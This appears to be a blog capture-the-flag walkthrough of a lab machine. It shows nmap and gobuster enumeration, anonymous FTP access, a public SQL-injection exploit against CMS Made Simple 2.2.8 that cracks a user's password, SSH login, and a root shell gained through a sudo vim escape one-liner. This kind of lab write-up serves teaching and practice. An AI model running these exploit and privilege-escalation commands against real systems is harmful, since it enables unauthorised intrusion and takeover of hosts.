Recon
We start with nmap scanning
sudo nmap -sV -A -T4 10.10.233.41 -oN nmap_results.txt
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can\'t get directory listing: TIMEOUT
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.2.59.127
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-robots.txt: 2 disallowed entries
|_/ /openemr-5_0_1_3
|_http-title: Apache2 Ubuntu Default Page: It works
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 294269149ecad917988c27723acda923 (RSA)
| 256 9bd165075108006198de95ed3ae3811c (ECDSA)
|_ 256 12651b61cf4de575fef4e8d46e102af6 (ED25519)
We have a ftp, ssh and HTTP server. Let's try to find exploit options.
FTP
We know this server runs with version vsFTPd 3.0.3 so, we can see if there is any available exploit. We find a way to do Denial of Service, but we should explore further.
We enter the server using ftp 10.10.233.41, we login as anonymous and we see what's inside
ftp> ls
229 Entering Extended Passive Mode (|||47815|)
ftp: Can't connect to `10.10.233.41:47815': Connection timed out
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Aug 17 2019 pub
226 Directory send OK.
ftp> cd pub
ftp> ls
229 Entering Extended Passive Mode (|||40149|)
ftp: Can't connect to `10.10.233.41:40149': Connection timed out
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 166 Aug 17 2019 ForMitch.txt
226 Directory send OK.
ftp> get ForMitch.txt
ftp> exit
cat ForMitch.txt
Dammit man... you'te the worst dev i've seen. You set the same pass for the system user, and the password is so weak... i cracked it in seconds. Gosh... what a mess!
With this message we have an opportunity to bruteforce
HTTP
Homepage
We access homepage and we see default Apache2 page
Robots
We also verify the robots page and we strike gold as we are able to get the address /openemr-5_0_1_3 and the user mike
There is nothing under 10.10.233.41/openemr-5_0_1_3 so we reached a dead-end exploring the website.
Directory listing
gobuster dir -t 64 -u http://10.10.233.41:80 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.txt
/simple (Status: 301) [Size: 313] [--> http://10.10.233.41/simple/]
/server-status (Status: 403) [Size: 300]
Simple
We check the /simple page and verify it was built using CMS Made Simple v 2.2.8
We search for an exploit for this page and we find an SQL injection
Install Pip and Termcolor
curl https://bootstrap.pypa.io/pip/2.7/get-pip.py > get-pip.py
sudo python2 get-pip.py
sudo python2 -m pip install --upgrade pip
sudo python2 -m pip install --upgrade setuptools
sudo python2 -m pip install termcolor
sudo python2 46635.py -u http://10.10.233.41/simple --crack -w /usr/share/seclists/Passwords/Common-Credentials/best110.txt
[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: admin@admin.com
[+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96
[+] Password cracked: secret
With the username and password we can now enter the machine using ssh
Accessing Machine
ssh mitch@10.10.233.41 -p 2222
# yes
# secret
cat user.txt
sudo -l
# Vim
sudo vim -c ':py3 import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
cat /root/root.txt
Kanelao
Top comments (0)